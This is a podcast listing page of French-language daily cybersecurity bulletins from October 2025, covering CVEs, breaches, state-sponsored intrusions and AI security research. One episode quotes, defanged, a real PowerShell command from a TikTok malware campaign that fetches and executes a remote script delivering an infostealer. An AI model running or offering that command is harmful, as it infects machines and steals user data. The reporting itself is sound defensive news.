RadioCSIRT : Edition Française

By Marc Frédéric GOMEZ

🎙 Marc Frédéric Gomez, expert en cybersécurité, vous livre chaque jour l’essentiel des menaces, attaques et stratégies de défense à connaître.

🔎 Au programme :

✔️ Décr... more

Download on the App Store

Download on the App Store

Get it on Google Play

FAQs about RadioCSIRT : Edition Française:

How many episodes does RadioCSIRT : Edition Française have?

The podcast currently has 482 episodes available.

RadioCSIRT : Edition Française episodes:

October 20, 2025 RadioCSIRT — Votre actu cybersécurité du lundi 20 octobre 2025 (Ép.460)
Bienvenue dans votre bulletin cybersécurité du jour ⚡️
🧠 ExCyTIn-Bench — Évaluation des agents LLM en investigation cyber
Des chercheurs de Microsoft et de plusieurs universités publient ExCyTIn-Bench, le premier benchmark destiné à mesurer la capacité des agents basés sur des LLM à mener des investigations de menaces.Le jeu de données s’appuie sur un environnement Azure contrôlé avec huit attaques multi-étapes simulées, 57 tables de logs issues de Microsoft Sentinel et 589 questions automatisées.Les résultats indiquent une difficulté notable : le score moyen obtenu par les modèles est de 0,249, le meilleur atteignant 0,368.
👉 Code et données seront publiés prochainement.
🧩 CERT-FR — Vulnérabilité critique dans Linux PAM
Le CERT-FR publie l’avis CERTFR-2025-AVI-0889 concernant une vulnérabilité dans Linux Pluggable Authentication Modules (PAM).Cette faille permet une élévation locale de privilèges et est exploitée via un module de gestion d’authentification mal configuré.Un code d’exploitation (Proof of Concept) est déjà disponible, augmentant le risque d’exploitation active.

📡 Décret français — Conservation massive des données télécoms
Le ministre des Armées Sébastien Lecornu signe un décret validant la conservation de masse des données de connexion par les opérateurs télécoms.Cette mesure vise à renforcer les capacités de traçabilité pour la sécurité nationale et la lutte contre le terrorisme. Elle officialise la possibilité pour les opérateurs de stocker les métadonnées des communications pendant une période prolongée.
🐧 Linux PAM — Exploit public disponible
Des chercheurs en sécurité publient un exploit fonctionnel pour la vulnérabilité Linux PAM. L’attaque permet à un utilisateur local d’obtenir des privilèges root sur plusieurs distributions Linux non corrigées.Les exploitations reposent sur des appels système détournés via le module pam_unix.so.
👉 L’exploitation est considérée comme triviale sur les versions affectées.
🐉 Cyberespionnage — Pékin accuse la NSA
Les autorités chinoises affirment avoir découvert des preuves irréfutables d’attaques menées par la NSA américaine contre le système de temps officiel chinois. Les attaques auraient ciblé la Time Authority nationale, un service critique utilisé pour la synchronisation sécurisée d’infrastructures gouvernementales et industrielles. Les investigations sont menées par le National Computer Virus Emergency Response Center (CVERC) et l’équipe Qi An Pangu Lab, déjà connue pour ses analyses de campagnes liées à Equation Group.
⚡️ On ne réfléchit pas, on patch !
📚 Sources :
https://arxiv.org/abs/2507.14201
https://www.cert.ssi.gouv.fr/avis/CERTFR-2025-AVI-0889/
https://www.clubic.com/actualite-583825-sebastien-lecornu-signe-un-decret-qui-valide-la-conservation-de-masse-des-donnees-par-les-operateurs-telecoms.html
https://cybersecuritynews.com/poc-exploit-linux-pam-vulnerability/
https://securityaffairs.com/183619/intelligence/china-finds-irrefutable-evidence-of-us-nsa-cyberattacks-on-time-authority.html
📞 Partagez vos retours :
📱 07 68 72 20 09
📧 [email protected]
🌐 https://www.radiocsirt.org
📰 https://radiocsirt.substack.com
#CyberSécurité #CERT #SOC #ThreatIntel #Linux #PAM #LLM #ExCyTInBench #Azure #NSA #China #DataRetention #France #RadioCSIRT
...more
10min
October 19, 2025RadioCSIRT — CTI & LLM : vers une génération augmentée d’indicateurs (Ép.459)
🧠 Au programme aujourd’hui :
➡️ Comment les grands modèles de langage (LLM) transforment la Cyber Threat Intelligence.
➡️ Extraction automatisée d’IOCs à partir de rapports techniques (CERT-FR, Mandiant, etc.).
➡️ Corrélation augmentée : comment GPT-5, Claude 3 ou Llama 3 aident à contextualiser les menaces.
➡️ Les dérives possibles : hallucinations, fuites de données, biais d’attribution.
➡️ Pourquoi la CTI de demain sera augmentée, pas automatisée.
🧩 Concrètement :
Les CERT, CSIRT et SOC explorent désormais les capacités des LLM pour accélérer :
la structuration des rapports techniques non standardisés,
la corrélation d’indicateurs via OpenCTI, MISP
et la détection des patterns faibles dans les logs et menaces émergentes.
Mais attention :
➡️ Un LLM n’a aucune conscience du risque.
➡️ Il peut inventer des IOC inexistants.
➡️ Et il ne doit jamais être connecté à des données sensibles sans contrôle humain.
C’est toute la philosophie du Human-in-the-Loop :

👉 L’IA accélère. L’humain valide. La CTI gagne en précision.
📚 Sources :
https://www.mandiant.com/resources
https://www.cert.ssi.gouv.fr/
https://github.com/OpenCTI-Platform/opencti
https://python.langchain.com/
https://llamaindex.ai/
🎧 Écoutez RadioCSIRT sur :
📱 Apple Podcast – Spotify – SoundCloud – Deezer
📞 Contact : 07 68 72 20 09 - 🔗 https://www.radiocsirt.org
#Cybersecurity #ThreatIntelligence #CTI #SOC #CSIRT #LLM #GPT4 #OpenCTI #AI #RadioCSIRT
...more
38min
October 18, 2025 RadioCSIRT —Votre actu cybersécurité du samedi 18 octobre 2025 (Ép.458)
🎧🎙️ Bienvenue dans votre bulletin cybersécurité du jour ⚡️
🦀 Windows Kernel — Attaque “Denial of Fuzzing” dans le code Rust.
Check Point Research révèle une nouvelle technique ciblant les composants Rust intégrés au noyau Windows.
L’attaque, baptisée Denial of Fuzzing, permet de contourner les protections du moteur de fuzzing pour masquer des conditions de course et des corruptions mémoire.
Microsoft a confirmé l’enquête en interne et recommande de renforcer la surveillance des tests automatisés Rust pour détecter des anomalies non reproductibles.
👉 Une démonstration de la méthode a été publiée avec preuves de concept et corrélations possibles avec les récentes failles CVE-2025-59230 et CVE-2025-47827.
💳 Prosper Marketplace — Fuite de données de 17 millions de personnes
Le prêteur en ligne américain Prosper Marketplace a signalé une brèche affectant près de 17 millions de comptes clients.
Les données exposées comprennent noms, adresses postales, e-mails, numéros de téléphone et fragments d’identifiants financiers.
L’incident, lié à une erreur de configuration sur un service cloud tiers, pourrait faciliter des campagnes massives de vol d’identité et de phishing ciblé.
Les autorités fédérales et la FTC ont été saisies.
⚙️ Malwarebytes — Migration stratégique vers WordPress
Les ingénieurs de Malwarebytes détaillent les raisons techniques du choix de WordPress comme CMS principal.
Le passage vise à renforcer la modularité, la rapidité de déploiement et l’intégration de flux Threat Intelligence automatisés.
Ce retour d’expérience éclaire la gestion d’un environnement de haute sécurité basé sur un CMS open source, avec durcissement, CI/CD et politiques d’isolation réseau strictes.
🔐 Microsoft — Vague d’attaques par compromission d’identité
Microsoft alerte sur une hausse marquée des compromissions d’identité dans les environnements cloud.
Les attaquants exploitent des tokens OAuth valides et des comptes d’administration dormants pour accéder aux portails Entra ID et Azure AD.
Le rapport met en évidence une corrélation avec les campagnes récentes utilisant des outils de red teaming détournés (Storm-1975, Octo Tempest).
👉 Microsoft recommande l’audit complet des permissions OAuth et la rotation immédiate des clés d’application inactives.
🔥 F5 Networks — Code source exfiltré par un acteur étatique
Unit42 confirme qu’un acteur étatique a volé une partie du code source de la plateforme BIG-IP lors d’une compromission de longue durée.
L’opération, attribuée à un groupe soutenu par un État, a visé les environnements de développement internes et permis l’accès à des informations sur des vulnérabilités non publiées.
Cette compromission pourrait servir à des attaques ciblées contre des infrastructures critiques utilisant les produits F5.
👉 L’enquête reste en cours, et la CISA a publié une directive d’urgence demandant un audit complet des installations concernées.
⚡️ On ne réfléchit pas, on patch !
📚 Sources :
https://research.checkpoint.com/2025/denial-of-fuzzing-rust-in-the-windows-kernel/
https://www.malwarebytes.com/blog/news/2025/10/prosper-data-breach-puts-17-million-people-at-risk-of-identity-theft
https://www.malwarebytes.com/blog/inside-malwarebytes/2025/10/under-the-engineering-hood-why-malwarebytes-chose-wordpress-as-its-cms
https://therecord.media/microsoft-warns-of-surge-identity-hacks-passwords
https://unit42.paloaltonetworks.com/nation-state-threat-actor-steals-f5-source-code/
📞 Partagez vos retours :
📱 07 68 72 20 09
📧 [email protected]
🌐 https://www.radiocsirt.org
📰 https://radiocsirt.substack.com
#CyberSécurité #CERT #SOC #ThreatIntel #Windows #Rust #Fuzzing #Prosper #DataBreach #Malwarebytes #WordPress #Microsoft #Identity #F5 #RadioCSIRT
...more
14min
October 17, 2025 RadioCSIRT - Votre actu cybersécurité du vendredi 17 octobre 2025 (Ép.457)
Bienvenue dans votre bulletin cybersécurité du jour ⚡️
🛫 American Airlines / Envoy Air — Fuite de données Oracle E-Business Suite
Envoy Air, filiale d’American Airlines, confirme une compromission sur son application Oracle E-Business Suite, après la revendication du groupe Clop.Selon la compagnie, aucune donnée client sensible n’a été touchée, mais un volume limité d’informations commerciales a pu être exfiltré. La campagne d’extorsion est liée à l’exploitation d’une faille zero-day, la CVE-2025-61882, précédant un correctif discret d’Oracle sur la CVE-2025-61884.
👮 Europol — Démantèlement d’un réseau international de SIM-box
L’opération SIMCARTEL a permis de démanteler un service illégal de location de cartes SIM.1 200 dispositifs et 40 000 SIM étaient utilisés dans plus de 3 200 fraudes, causant 4,5 millions d’euros de pertes.Deux sites web, gogetsms.com et apisim.com, ont été saisis.Sept personnes ont été arrêtées, et plus de 49 millions de comptes frauduleux ont été créés à travers ce réseau.
📦 Apache ActiveMQ — Vulnérabilité critique CVE-2025-54539
Une faille critique d’exécution de code à distance affecte Apache ActiveMQ NMS AMQP Client jusqu’à la version 2.3.0.Origine : désérialisation non fiable de données (CWE-502) lors de connexions à un broker AMQP malveillant.Score CVSS 9.8, sans privilèges ni interaction. Corrigée en version 2.4.0, supprimant le mécanisme vulnérable.
🎬 TikTok — Campagne PowerShell diffusant AuroStealer
Des vidéos TikTok diffusent de faux outils d’activation logicielle, incitant à exécuter la commande PowerShell : iex (irm slmgr[.]win/photoshop) Celle-ci télécharge un script malveillant, puis un exécutable AuroStealer chargé de voler des données. Persistance via tâches planifiées Windows et auto-compilation à la volée via csc.exe, permettant une exécution en mémoire sans trace sur disque.
📨 Zendesk — Détournement massif des workflows de support
Des acteurs malveillants exploitent l’absence d’authentification dans certaines instances Zendesk. Résultat : des milliers de messages automatiques envoyés via les domaines clients, saturant les boîtes mail cibles. Les tickets anonymes et les déclencheurs automatiques ont permis cette attaque en masse, que Zendesk qualifie d’abus distribué « many-against-one ».
⚖️ Affaire BreachForums — Entre défi technique et dérive judiciaire
Cinq individus ont été interpellés en France entre février et juin 2025, soupçonnés d’être liés à BreachForums et à plusieurs pseudonymes connus : IntelBroker, ShinyHunters, Hollow, Noct, et Depressed. Leurs avocats décrivent un mélange d’immaturité et de savoir-faire technique, sans motivation financière. Malgré ces arrestations, le site a brièvement rouvert en juillet avant d’être de nouveau fermé par le FBI et la BL2C.
⚡️ On ne réfléchit pas, on patch !
📚 Sources :
https://www.bleepingcomputer.com/news/security/american-airlines-subsidiary-envoy-confirms-oracle-data-theft-attack/
https://www.bleepingcomputer.com/news/security/europol-dismantles-sim-box-operation-renting-numbers-for-cybercrime/
https://thecyberthrone.in/2025/10/17/apache-activemq-affected-by-cve-2025-54539/
https://cyberpress.org/tiktok-powershell-malware/
https://krebsonsecurity.com/2025/10/email-bombs-exploit-lax-authentication-in-zendesk/
https://www.zdnet.fr/actualites/affaire-breachforums-les-mis-en-cause-voulaient-challenger-la-securite-des-grands-groupes-483565.htm
📞 Partagez vos retours :
📱 07 68 72 20 09
📧 [email protected]
🌐 https://www.radiocsirt.org
📰 https://radiocsirt.substack.com
#CyberSécurité #CERT #SOC #ThreatIntel #Oracle #Clop #ActiveMQ #CVE202554539 #AuroStealer #TikTok #Zendesk #Europol #SIMBox #BreachForums #RadioCSIRT
...more
15min
October 17, 2025RadioCSIRT — Patch Tuesday octobre 2025 (Ép.456)
Bienvenue dans votre bulletin spécial Patch Tuesday d’octobre 2025 ⚡️
🧩 Microsoft — 172 vulnérabilités corrigées, 6 zero-days
Le Patch Tuesday d’octobre corrige 172 failles, dont 6 zero-days et 8 vulnérabilités critiques.
Fin de support pour Windows 10, remplacé par le programme Extended Security Updates (ESU).
Les zero-days exploitées sont :
CVE-2025-24990 — Agere Modem Driver, élévation de privilèges, pilote supprimé du système. Attribution : Fabian Mosch et Jordan Jay.
CVE-2025-59230 — Windows Remote Access Connection Manager, élévation de privilèges locale, exploitation active. Attribution : MSTIC et MSRC.
CVE-2025-47827 — Secure Boot bypass dans IGEL OS avant la version 11, découverte par Zack Didcott.
Les zero-days divulguées publiquement :
CVE-2025-0033 — AMD EPYC SEV-SNP, corruption RMP lors de l’initialisation. Chercheurs : Benedict Schlueter, Supraja Sridhara, Shweta Shinde (ETH Zurich).
CVE-2025-24052 — Variante de la faille Agere Modem, exploitable même sans modem actif.
CVE-2025-2884 — TCG TPM 2.0, lecture hors limites, risque de divulgation d’informations. Attribution : Trusted Computing Group et chercheur anonyme.

🚨 CVE-2025-59287 — Windows Server Update Services (WSUS)
Faille critique d’exécution de code à distance, score CVSS 9.8.
Vecteur réseau, aucune authentification requise. Microsoft qualifie l’exploitation comme « plus probable ».
📄 Microsoft Office et composants associés
Plusieurs vulnérabilités RCE via le Preview Pane (CVE-2025-59227, CVE-2025-59234).
Correctifs aussi pour Azure, Entra ID, Copilot, Kernel, BitLocker, Exchange, SharePoint, .NET et Visual Studio.
🔧 Autres éditeurs — Mises à jour d’octobre 2025
Adobe : correctifs multiples.
Cisco : IOS, UCM, Cyber Vision Center.
Draytek : RCE pré-auth sur routeurs Vigor.
Gladinet : zero-day CentreStack activement exploitée.
Ivanti : correctifs pour EPMM et Neurons for MDM.
Oracle : deux zero-days dans E-Business Suite.
Redis : RCE de sévérité maximale.
SAP : faille critique d’exécution de commande dans NetWeaver.
Synacor : zero-day dans Zimbra Collaboration Suite exploitée pour vol de données.
🧭 Cycle de vie Microsoft
Derniers correctifs gratuits pour Windows 10, Office 2016/2019, Exchange 2016/2019.
Remplacement d’Exchange Server par Exchange Server Subscription Edition.
⚡️ On ne réfléchit pas, on patch !
📚 Sources :
https://krebsonsecurity.com/2025/10/patch-tuesday-october-2025-end-of-10-edition/
https://www.bleepingcomputer.com/news/microsoft/microsoft-october-2025-patch-tuesday-fixes-6-zero-days-172-flaws/
https://www.rapid7.com/blog/post/em-patch-tuesday-october-2025/
📞 Partagez vos retours :
📱 07 68 72 20 09
📧 [email protected]
🌐 https://www.radiocsirt.org
📰 https://radiocsirt.substack.com
#CyberSécurité #PatchTuesday #Microsoft #CERT #CVE #ZeroDay #Windows10 #WSUS #Office #Azure #Exchange #TPM #AMD #RCE #Update #RadioCSIRT
...more
8min
October 16, 2025 RadioCSIRT — Votre actu cybersécurité du jeudi 16 octobre 2025 (Ép.455)
Bienvenue dans votre bulletin d'actualités cybersécurité ⚡️
🔥 F5 Networks — Intrusion majeure par acteur étatique
F5 révèle une compromission détectée le 9 août 2025. Un acteur étatique sophistiqué a maintenu un accès persistant long terme dans les environnements de développement BIG-IP. Code source exfiltré, informations sur des vulnérabilités non publiques dérobées.

La CISA publie la directive d'urgence 26-01 ordonnant aux agences fédérales de patcher avant le 22 octobre.

Le NCSC britannique émet également une alerte. Risque : exploitation des produits F5 pour voler credentials et clés API, permettant mouvements latéraux et accès persistants dans les réseaux cibles.
📊 CERT-FR — 46 vulnérabilités corrigées dans l'écosystème F5
Le CERT-FR publie l'avis CERTFR-2025-AVI-0886. F5 corrige 46 CVE dans son bulletin K000156572 du 15 octobre. Impacts multiples : RCE, élévation de privilèges, SSRF, XSS et déni de service. Tous les BIG-IP sont concernés : versions 15.1.x, 16.1.x, 17.1.x et 17.5.x nécessitent une mise à jour immédiate. Également touchés : BIG-IP Next CNF, BIG-IP Next pour Kubernetes, BIG-IP Next SPK et NGINX App Protect WAF avant la version 4.7.0.
💬 Mattermost — Multiples failles de sécurité
Le CERT-FR alerte via l'avis CERTFR-2025-AVI-0888 sur six bulletins de sécurité Mattermost publiés le 15 octobre : MMSA-2025-00465, 00492, 00493, 00518, 00540 et 00541. Versions vulnérables : Mattermost Server 10.5.x avant 10.5.12, 10.10.x avant 10.10.3, 10.11.x avant 10.11.4, 10.12.x avant 10.12.1, et toutes les versions 11.x avant 11.0.0. La nature exacte des risques n'est pas précisée par l'éditeur.
🚨 Adobe Experience Manager — CVE-2025-54253 exploitée activement
La CISA ajoute la CVE-2025-54253 à son catalogue KEV. Score CVSS 10.0 sur 10. Exploitation active confirmée dans la nature. Cette faille de mauvaise configuration affecte Adobe Experience Manager Forms versions 6.5.23 et antérieures, permettant une RCE sans authentification ni interaction utilisateur. Découverte par Adam Kues et Shubham Shah de Searchlight Cyber, divulguée le 28 avril, patchée en août. Un proof-of-concept est public. Deadline CISA pour les agences fédérales : 5 novembre 2025.
⚡️ On ne réfléchit pas, on patch !
📚 Sources :
https://www.ncsc.gov.uk/news/confirmed-compromise-f5-network
https://www.cisa.gov/news-events/news/cisa-issues-emergency-directive-address-critical-vulnerabilities-f5-devices https://www.cert.ssi.gouv.fr/avis/CERTFR-2025-AVI-0886/ https://www.cert.ssi.gouv.fr/avis/CERTFR-2025-AVI-0888/ https://www.bleepingcomputer.com/news/security/cisa-maximum-severity-adobe-flaw-now-exploited-in-attacks/
📞 Partagez vos retours :
📱 07 68 72 20 09
📧 [email protected]
🌐 https://www.radiocsirt.org
📰 https://radiocsirt.substack.com
#Cybersécurité #ThreatIntel #CERT #SOC #F5 #CISA #NCSC #Adobe #AEM #RCE #Mattermost #Patch #EmergencyDirective #KEV
...more
6min
October 15, 2025 RadioCSIRT - Votre actu cybersécurité du mercredi 15 octobre 2025 (Ép.454)
Bienvenue dans votre bulletin d’actualités cybersécurité ⚡️
🐂 Phantom Taurus — Campagne d’espionnage ciblée en Asie et en Europe
Unit42 révèle une activité soutenue du groupe Phantom Taurus (alias APT15), exploitant des implants personnalisés pour infiltrer des institutions gouvernementales et diplomatiques. Le malware, dissimulé dans des documents Office, utilise un mécanisme de commande et contrôle via des serveurs compromis hébergés sur des infrastructures légitimes. Les opérateurs cherchent à exfiltrer des données sensibles sur la politique étrangère et la défense.
🇺🇦 CERT-UA — Campagne d’hameçonnage massive contre les institutions ukrainiennes
Le CERT-UA alerte sur une vague de spear-phishing attribuée à UAC-0050, exploitant des pièces jointes Excel malveillantes. L’objectif : déployer un script PowerShell téléchargeant un binaire compressé via archive ZIP. Les charges utiles mènent à des implants capables de capturer les frappes clavier et les données d’authentification de messageries internes.
🏢 NCSC — Un nouveau kit de cybersécurité pour les petites entreprises
Le National Cyber Security Centre (Royaume-Uni) lance un Cyber Security Toolkit for Small Businesses, un ensemble de guides pratiques couvrant la gestion des mots de passe, les sauvegardes, la protection des comptes cloud et la détection d’activités suspectes. L’objectif : renforcer la résilience des PME face à la montée des attaques par rançongiciel et fraude par e-mail.
☕ Oracle — Patch d’urgence pour E-Business Suite
Oracle publie un correctif hors cycle pour une vulnérabilité critique affectant E-Business Suite (versions 12.2.3 à 12.2.14). Référencée CVE-2025-61882, la faille permet une exécution de code à distance sans authentification et serait activement exploitée par des acteurs malveillants, dont le groupe Cl0p.
🦊 Mozilla — Lancement en bêta du VPN Firefox pour Windows et macOS
Mozilla annonce la bêta publique de son service Firefox VPN. Intégré nativement au navigateur, il utilise le protocole WireGuard et se concentre sur la confidentialité. Les premiers tests montrent une réduction moyenne de 8 % des performances réseau, mais un chiffrement efficace du trafic DNS et des connexions sortantes.
🏭 SAP NetWeaver — Nouvelle vulnérabilité critique CVE-2025-7521
Une faille d’injection de code découverte dans le composant SAP NetWeaver Application Server Java permet à un attaquant non authentifié d’exécuter du code à distance. The Hacker News précise que la vulnérabilité réside dans le module de gestion des requêtes HTTP et pourrait compromettre des environnements ERP entiers si non corrigée.
⚡️ On ne réfléchit pas, on patch !
📚 Sources :
https://unit42.paloaltonetworks.com/phantom-taurus/
https://cert.gov.ua/article/6285731
https://www.ncsc.gov.uk/news/small-businesses-receive-cyber-security-boost-with-new-toolkit-from-experts
https://www.theregister.com/2025/10/14/oracle_rushes_out_another_emergency/
https://www.theregister.com/2025/10/14/mozilla_firefox_vpn_beta/
https://thehackernews.com/2025/10/new-sap-netweaver-bug-lets-attackers.html
📞 Partagez vos retours :
📱 07 68 72 20 09
📧 [email protected]
🌐 https://www.radiocsirt.org
📰 https://radiocsirt.substack.com
#Cybersécurité #ThreatIntel #CERT #SOC #APT15 #PhantomTaurus #Ukraine #CERTUA #NCSC #Oracle #Firefox #VPN #SAP #Patch
...more
15min
October 14, 2025RadioCSIRT — Votre actu cybersécurité du mardi 14 octobre 2025 (Ép.453)
Bienvenue dans votre bulletin d'actualités cybersécurité ⚡️
🦠 Astaroth — Trojan bancaire exploitant GitHub
McAfee Labs découvre une campagne du malware Astaroth ciblant principalement le Brésil. Le trojan abuse des dépôts GitHub pour héberger ses configurations via stéganographie. L'infection débute par phishing avec fichier point lnk, déploie un shellcode AutoIT, puis intercepte les frappes clavier sur les sites bancaires et crypto. 15 milliards de dollars saisis, plus grande saisie de l'histoire du DOJ.
🏛️ Cambodge — 15 milliards de dollars saisis au Prince Group
Le Département de la Justice américain saisit 127.271 bitcoins liés à Chen Zhi, président du conglomérat cambodgien Prince Group. Il supervisait au moins 10 complexes d'arnaque utilisant du travail forcé pour du pig butchering. Les documents internes révèlent 76.000 comptes contrôlés et 30 millions de dollars de profits quotidiens. Le Trésor sanctionne 146 personnes et entités dont 117 sociétés écrans.
🇨🇳 Flax Typhoon — Backdoor via ArcGIS Server pendant un an
ReliaQuest attribue une campagne d'espionnage au groupe chinois Flax Typhoon. Les attaquants ont modifié une extension Java Server Object d'ArcGIS en web shell protégé par clé hardcodée. Un exécutable SoftEther VPN renommé bridge point exe crée un canal VPN covert permettant mouvements latéraux et exfiltration. Persistence assurée via sauvegardes système.
🔐 Botnet — 100.000 IP attaquent les services RDP américains
GreyNoise détecte un botnet ciblant les services Remote Desktop Protocol aux États-Unis depuis le 8 octobre. Les attaques proviennent de plus de 100.000 adresses IP dans plus de 100 pays. Une seule entité contrôle le botnet avec empreinte TCP partagée. Deux vecteurs utilisés : attaques de timing RD Web Access et énumération de connexion client web RDP.
🚨 CISA — Cinq vulnérabilités ajoutées au catalogue KEV
La CISA ajoute cinq CVE exploitées activement le 14 octobre. La CVE-2016-7836 affecte SKYSEA Client View, la CVE-2025-6264 Rapid7 Velociraptor, la CVE-2025-24990 et la CVE-2025-59230 Microsoft Windows, la CVE-2025-47827 IGEL OS. La directive BOD 22-01 exige la remédiation par les agences fédérales avant la date limite.
⚡️ On ne réfléchit pas, on patch !
📚 Sources :
https://www.mcafee.com/blogs/other-blogs/mcafee-labs/astaroth-banking-trojan-abusing-github-for-resilience/
https://therecord.media/feds-sanction-cambodian-conglomerate-scams-seize-15-billion
https://thehackernews.com/2025/10/chinese-hackers-exploit-arcgis-server.html
https://securityaffairs.com/183389/security/researchers-warn-of-widespread-rdp-attacks-by-100k-node-botnet.html
https://www.cisa.gov/news-events/alerts/2025/10/14/cisa-adds-five-known-exploited-vulnerabilities-catalog
📞 Partagez vos retours :
📱 07 68 72 20 09
📧 [email protected]
🌐 https://www.radiocsirt.org
📰 https://radiocsirt.substack.com
#Cybersécurité #ThreatIntel #CERT #SOC #Ransomware #RDP #Botnet #GitHub #ArcGIS #CISA #KEV
...more
12min
October 13, 2025 RadioCSIRT — Votre actu cybersécurité du lundi 13 octobre 2025 (Ép.452)
Bienvenue dans votre bulletin d’actualités cybersécurité ⚡️
🧠 IA — Empoisonnement de modèles d’apprentissage
Des chercheurs de l’Institut britannique de sécurité de l’IA, d’Anthropic et de l’Institut Alan Turing démontrent qu’à peine 250 documents malveillants suffisent à créer une porte dérobée dans un modèle de langage. Le déclencheur provoque la génération de texte incohérent. Une étude majeure qui rebat les cartes de la sécurité de l’entraînement IA.
🏛️ Australie — Protection des infrastructures critiques
L’Australian Cyber Security Centre publie le guide CI Fortify, incitant les opérateurs d’infrastructures essentielles à renforcer leur posture. Objectifs : pouvoir isoler les systèmes OT critiques pendant 3 mois et reconstruire rapidement les environnements essentiels pour limiter les impacts d’une attaque.
🎓 EBIOS Risk Manager — Formation gratuite certifiée ANSSI
Le Club EBIOS, en partenariat avec l’ANSSI, lance un MOOC gratuit sur l’analyse de risques. Trois heures de formation accessibles à tous, sans prérequis, pour découvrir la méthode EBIOS Risk Manager et obtenir un diplôme certifié par l’agence nationale.
🎓 Harvard — Piratage revendiqué par Clop
Le groupe Clop ransomware revendique l’attaque de l’Université Harvard. Une page dédiée est apparue sur son site de fuite Tor, annonçant la diffusion prochaine des données volées. Clop, actif depuis 2019 et issu du groupe TA505, continue de cibler des institutions à forte valeur médiatique.
⚡️ On ne réfléchit pas, on patch !
📚 Sources :
https://next.ink/203904/250-documents-suffisent-a-empoisonner-lentrainement-dune-ia/
https://www.cyber.gov.au/view-all-content/news/new-guidance-to-help-fortify-australias-critical-infrastructure
https://securityaffairs.com/183282/cyber-crime/clop-ransomware-group-claims-the-hack-of-harvard-university.html
https://lms.club-ebios.org/
📞 Partagez vos retours :
📱 07 68 72 20 09
📧 [email protected]
🌐 https://www.radiocsirt.org
📰 https://radiocsirt.substack.com
...more
12min
October 12, 2025RadioCSIRT Votre actu cybersécurité du dimanche 12 octobre 2025 (Ép.451)
Bienvenue dans votre bulletin d'actualités cybersécurité ⚡️
🐍 Python — CVE-2025-8291
Vulnérabilité non spécifiée affectant toutes les versions CPython non corrigées. Consultez le bulletin de sécurité officiel et appliquez les correctifs immédiatement.
🦀 ChaosBot — Malware Rust sophistiqué
Ciblage d'environnements financiers via VPN Cisco compromis + comptes AD sur-privilégiés. DLL side-loading, C2 Discord, évasion ETW. Renforcez vos contrôles VPN et auditez vos service accounts.
🎯 GXC Team — Démantèlement en Espagne
Arrestation du leader brésilien "GoogleXcoder" (25 ans). Kits de phishing IA, malware Android, 300+ entités ciblées. 6 perquisitions, canaux Telegram désactivés.
🔓 ServiceNow — Multiples CVE critiques
CVE-2025-3089 (AI Platform), CVE-2025-0337 (bypass auth), CVE-2024-8924 (SQL injection non auth). Vérifiez vos versions et planifiez les mises à jour.
🔥 SonicWall VPN — Compromission massive
100+ comptes SSL VPN compromis sur 16 clients. Authentifications depuis 202.155.8[.]73. Lien probable avec campagne Akira ransomware exploitant CVE-2024-40766.
⚡️ On ne réfléchit pas, On patch !
📚 Sources :
https://www.cert.ssi.gouv.fr/avis/CERTFR-2025-AVI-0851/
https://cyberpress.org/chaosbot-ciscovpn-attack/
https://www.esentire.com/blog/new-rust-malware-chaosbot-uses-discord-for-command-and-control
https://securityaffairs.com/183252/cyber-crime/cybercrime-ring-gxc-team-dismantled-in-spain-25-year-old-leader-detained.html
https://web.guardiacivil.es/es/destacados/noticias/La-Guardia-Civil-desmantela-una-red-de-phishing-bancario-y-detiene-al-principal-desarrollador-de-kits-de-robo-de-credenciales-en-Espana/
https://support.servicenow.com/kb?id=kb_article_view&sysparm_article=KB1226057
https://thehackernews.com/2025/10/experts-warn-of-widespread-sonicwall.html
https://www.huntress.com/blog/sonicwall-sslvpn-compromise
https://www.sonicwall.com/support/knowledge-base/mysonicwall-cloud-backup-file-incident/250915160910330
📞 Partagez vos retours :
📱 07 68 72 20 09
📧 [email protected]
🌐 Site : https://www.radiocsirt.org
📰 Newsletter : https://radiocsirt.substack.com
...more
14min

FAQs about RadioCSIRT : Edition Française:

How many episodes does RadioCSIRT : Edition Française have?

The podcast currently has 482 episodes available.